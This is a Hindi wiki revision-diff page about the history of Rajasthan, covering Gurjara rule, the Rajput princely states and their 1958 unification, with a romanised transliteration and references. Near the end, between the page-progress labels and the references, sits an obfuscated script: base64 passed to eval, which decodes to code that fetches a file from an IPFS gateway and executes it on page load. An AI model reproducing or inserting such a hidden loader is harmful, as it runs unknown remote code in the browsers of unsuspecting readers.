Difference between revisions of "राजस्थान का इतिहास"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सदी " to " सदी ")
m (Text replace - " सन " to " सन् ")
Line 1: Line 1:
 
[[राजस्थान]] का इतिहास प्रागैतिहासिक काल से शुरू होता है। ईसा पूर्व 3000 से 1000 के बीच यहाँ की [[संस्कृति]] [[सिंधु घाटी सभ्यता]] जैसी थी। 12वीं [[सदी]] तक राजस्थान के अधिकांश भाग पर [[गुर्जर|गुर्जरो]] का राज्य रहा है। गुजरात तथा राजस्थान का अधिकांश भाग गुर्जरत्रा (गुर्जरो से रक्षित देश) के नाम से जाना जाता था।<ref>{{cite book|title=The History and Culture of the Indian People: The classical age|author=Ramesh Chandra Majumdar|coauthor=Achut Dattatrya Pusalker, A. K. Majumdar, Dilip Kumar Ghose, Vishvanath Govind Dighe, Bharatiya Vidya Bhavan|publisher=Bharatiya Vidya Bhavan|year=1977|page=153}}</ref><ref>{{cite book|title=Desa, videsa me? Gurjara kya hai? tatha kya the?: Gurjara itihasa|authors=Mulatanasi?ha Varma|publisher=Akhila Bharatiya Gurjara Samaja Sudhara Sabha|year=1984|}}</ref><ref>{{cite book|title=Sekhava?i pradesa ka pracina itihasa|author= Surajanasi?ha Shekhavata|publisher=Sri Sardula Ejyukesana ?ras?a|year=1989|page=94}}</ref>गुर्जर प्रतिहारो ने 300 सालों तक पूरे उत्तरी-भारत को अरब आक्रान्ताओ से बचाया था।<ref>{{cite book|title=India: a history|author=John Keay|publisher=Grove Press|year=2001|id=ISBN 0-8021-3797-0, ISBN 978-0-8021-3797-5|url=http://books.google.co.in/books?id=3aeQqmcXBhoC&pg=PA195&dq|page=95}}</ref>बाद में जब राजपूतों ने इस राज्य के विविध भागों पर अपना आधिपत्य जमा लिया तो यह क्षेत्र ब्रिटिशकाल में राजपूताना (राजपूतों का स्थान) कहलाने लगा। 12वीं शताब्दी के बाद [[मेवाड़]] पर गुहिलोतों ने राज्य किया। मेवाड़ के अलावा जो अन्य रियासतें ऐतिहासिक दृष्टि से प्रमुख रहीं, वे हैं - [[भरतपुर]], जयपुर, [[बूँदी]], [[मारवाड़]], [[कोटा]], और [[अलवर]]। अन्य सभी रियासतें इन्हीं रियासतों से बनी। इन सभी रियासतों ने 1818 में अधीनस्थ गठबंधन की ब्रिटिश संधि स्वीकार कर ली जिसमें राजाओं के हितों की रक्षा की व्यवस्था थी, लेकिन इस संधि से आम जनता स्वाभाविक रूप से असंतुष्ट थी।
 
[[राजस्थान]] का इतिहास प्रागैतिहासिक काल से शुरू होता है। ईसा पूर्व 3000 से 1000 के बीच यहाँ की [[संस्कृति]] [[सिंधु घाटी सभ्यता]] जैसी थी। 12वीं [[सदी]] तक राजस्थान के अधिकांश भाग पर [[गुर्जर|गुर्जरो]] का राज्य रहा है। गुजरात तथा राजस्थान का अधिकांश भाग गुर्जरत्रा (गुर्जरो से रक्षित देश) के नाम से जाना जाता था।<ref>{{cite book|title=The History and Culture of the Indian People: The classical age|author=Ramesh Chandra Majumdar|coauthor=Achut Dattatrya Pusalker, A. K. Majumdar, Dilip Kumar Ghose, Vishvanath Govind Dighe, Bharatiya Vidya Bhavan|publisher=Bharatiya Vidya Bhavan|year=1977|page=153}}</ref><ref>{{cite book|title=Desa, videsa me? Gurjara kya hai? tatha kya the?: Gurjara itihasa|authors=Mulatanasi?ha Varma|publisher=Akhila Bharatiya Gurjara Samaja Sudhara Sabha|year=1984|}}</ref><ref>{{cite book|title=Sekhava?i pradesa ka pracina itihasa|author= Surajanasi?ha Shekhavata|publisher=Sri Sardula Ejyukesana ?ras?a|year=1989|page=94}}</ref>गुर्जर प्रतिहारो ने 300 सालों तक पूरे उत्तरी-भारत को अरब आक्रान्ताओ से बचाया था।<ref>{{cite book|title=India: a history|author=John Keay|publisher=Grove Press|year=2001|id=ISBN 0-8021-3797-0, ISBN 978-0-8021-3797-5|url=http://books.google.co.in/books?id=3aeQqmcXBhoC&pg=PA195&dq|page=95}}</ref>बाद में जब राजपूतों ने इस राज्य के विविध भागों पर अपना आधिपत्य जमा लिया तो यह क्षेत्र ब्रिटिशकाल में राजपूताना (राजपूतों का स्थान) कहलाने लगा। 12वीं शताब्दी के बाद [[मेवाड़]] पर गुहिलोतों ने राज्य किया। मेवाड़ के अलावा जो अन्य रियासतें ऐतिहासिक दृष्टि से प्रमुख रहीं, वे हैं - [[भरतपुर]], जयपुर, [[बूँदी]], [[मारवाड़]], [[कोटा]], और [[अलवर]]। अन्य सभी रियासतें इन्हीं रियासतों से बनी। इन सभी रियासतों ने 1818 में अधीनस्थ गठबंधन की ब्रिटिश संधि स्वीकार कर ली जिसमें राजाओं के हितों की रक्षा की व्यवस्था थी, लेकिन इस संधि से आम जनता स्वाभाविक रूप से असंतुष्ट थी।
  
वर्ष 1857 के विद्रोह के बाद लोग [[स्वतंत्रता आंदोलन]] में भाग लेने के लिए [[महात्मा गाँधी]] के नेतृत्व में एकजुट हुए। सन 1935 में अंग्रेज़ी शासन वाले भारत में प्रांतीय स्वायत्तता लागू होने के बाद राजस्थान में नागरिक स्वतंत्रता तथा राजनीतिक अधिकारों के लिए आंदोलन और तेज़ हो गया। [[1948]] में इन बिखरी हुई रियासतों को एक करने की प्रक्रिया शुरू हुई, जो [[1956]] में राज्य में पुनर्गठन क़ानून लागू होने तक जारी रही। सबसे पहले 1948 में मत्स्य संघ बना, जिसमें कुछ ही रियासतें शामिल हुई। धीरे-धीरे बाकी रियासतें भी इसमें मिलती गई। सन 1949 तक [[बीकानेर]], जयपुर, [[जोधपुर]] और [[जैसलमेर]] जैसी मुख्य रियासतें इसमें शामिल हो चुकी थीं और इसे बृहत्तर राजस्थान संयुक्त राज्य का नाम दिया गया। सन 1958 में [[अजमेर]], आबू रोड तालुका और सुनेल टप्पा के भी शामिल हो जाने के बाद वर्तमान राजस्थान राज्य विधिवत अस्तित्व में आया। राजस्थान की समूची पश्चिमी सीमा पर पाकिस्तान पडता है जबकि उत्तर में पंजाब, उत्तर पूर्व में हरियाणा, पूर्व में उत्तर प्रदेश, दक्षिण-पूर्व में मध्य प्रदेश और दक्षिण-पश्चिम में गुजरात है।
+
वर्ष 1857 के विद्रोह के बाद लोग [[स्वतंत्रता आंदोलन]] में भाग लेने के लिए [[महात्मा गाँधी]] के नेतृत्व में एकजुट हुए। सन् 1935 में अंग्रेज़ी शासन वाले भारत में प्रांतीय स्वायत्तता लागू होने के बाद राजस्थान में नागरिक स्वतंत्रता तथा राजनीतिक अधिकारों के लिए आंदोलन और तेज़ हो गया। [[1948]] में इन बिखरी हुई रियासतों को एक करने की प्रक्रिया शुरू हुई, जो [[1956]] में राज्य में पुनर्गठन क़ानून लागू होने तक जारी रही। सबसे पहले 1948 में मत्स्य संघ बना, जिसमें कुछ ही रियासतें शामिल हुई। धीरे-धीरे बाकी रियासतें भी इसमें मिलती गई। सन् 1949 तक [[बीकानेर]], जयपुर, [[जोधपुर]] और [[जैसलमेर]] जैसी मुख्य रियासतें इसमें शामिल हो चुकी थीं और इसे बृहत्तर राजस्थान संयुक्त राज्य का नाम दिया गया। सन् 1958 में [[अजमेर]], आबू रोड तालुका और सुनेल टप्पा के भी शामिल हो जाने के बाद वर्तमान राजस्थान राज्य विधिवत अस्तित्व में आया। राजस्थान की समूची पश्चिमी सीमा पर पाकिस्तान पडता है जबकि उत्तर में पंजाब, उत्तर पूर्व में हरियाणा, पूर्व में उत्तर प्रदेश, दक्षिण-पूर्व में मध्य प्रदेश और दक्षिण-पश्चिम में गुजरात है।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 14:12, 6 March 2012

rajasthan ka itihas pragaitihasik kal se shuroo hota hai. eesa poorv 3000 se 1000 ke bich yahaan ki sanskriti siandhu ghati sabhyata jaisi thi. 12vian sadi tak rajasthan ke adhikaansh bhag par gurjaro ka rajy raha hai. gujarat tatha rajasthan ka adhikaansh bhag gurjaratra (gurjaro se rakshit desh) ke nam se jana jata tha.[1][2][3]gurjar pratiharo ne 300 saloan tak poore uttari-bharat ko arab akrantao se bachaya tha.[4]bad mean jab rajapootoan ne is rajy ke vividh bhagoan par apana adhipaty jama liya to yah kshetr britishakal mean rajapootana (rajapootoan ka sthan) kahalane laga. 12vian shatabdi ke bad meva d par guhilotoan ne rajy kiya. meva d ke alava jo any riyasatean aitihasik drishti se pramukh rahian, ve haian - bharatapur, jayapur, booandi, marava d, kota, aur alavar. any sabhi riyasatean inhian riyasatoan se bani. in sabhi riyasatoan ne 1818 mean adhinasth gathabandhan ki british sandhi svikar kar li jisamean rajaoan ke hitoan ki raksha ki vyavastha thi, lekin is sandhi se am janata svabhavik roop se asantusht thi.

varsh 1857 ke vidroh ke bad log svatantrata aandolan mean bhag lene ke lie mahatma gaandhi ke netritv mean ekajut hue. sanh 1935 mean aangrezi shasan vale bharat mean praantiy svayattata lagoo hone ke bad rajasthan mean nagarik svatantrata tatha rajanitik adhikaroan ke lie aandolan aur tez ho gaya. 1948 mean in bikhari huee riyasatoan ko ek karane ki prakriya shuroo huee, jo 1956 mean rajy mean punargathan qanoon lagoo hone tak jari rahi. sabase pahale 1948 mean matsy sangh bana, jisamean kuchh hi riyasatean shamil huee. dhire-dhire baki riyasatean bhi isamean milati gee. sanh 1949 tak bikaner, jayapur, jodhapur aur jaisalamer jaisi mukhy riyasatean isamean shamil ho chuki thian aur ise brihattar rajasthan sanyukt rajy ka nam diya gaya. sanh 1958 mean ajamer, aboo rod taluka aur sunel tappa ke bhi shamil ho jane ke bad vartaman rajasthan rajy vidhivat astitv mean aya. rajasthan ki samoochi pashchimi sima par pakistan padata hai jabaki uttar mean panjab, uttar poorv mean hariyana, poorv mean uttar pradesh, dakshin-poorv mean madhy pradesh aur dakshin-pashchim mean gujarat hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sandarbh

  1. Ramesh Chandra Majumdar (1977) The History and Culture of the Indian People: The classical age. Bharatiya Vidya Bhavan.
  2. (1984) Desa, videsa me? Gurjara kya hai? tatha kya the?: Gurjara itihasa. Akhila Bharatiya Gurjara Samaja Sudhara Sabha.
  3. Surajanasi?ha Shekhavata (1989) Sekhava?i pradesa ka pracina itihasa. Sri Sardula Ejyukesana ?ras?a.
  4. John Keay (2001) India: a history. Grove Press. ISBN 0-8021-3797-0, ISBN 978-0-8021-3797-5.

sanbandhit lekh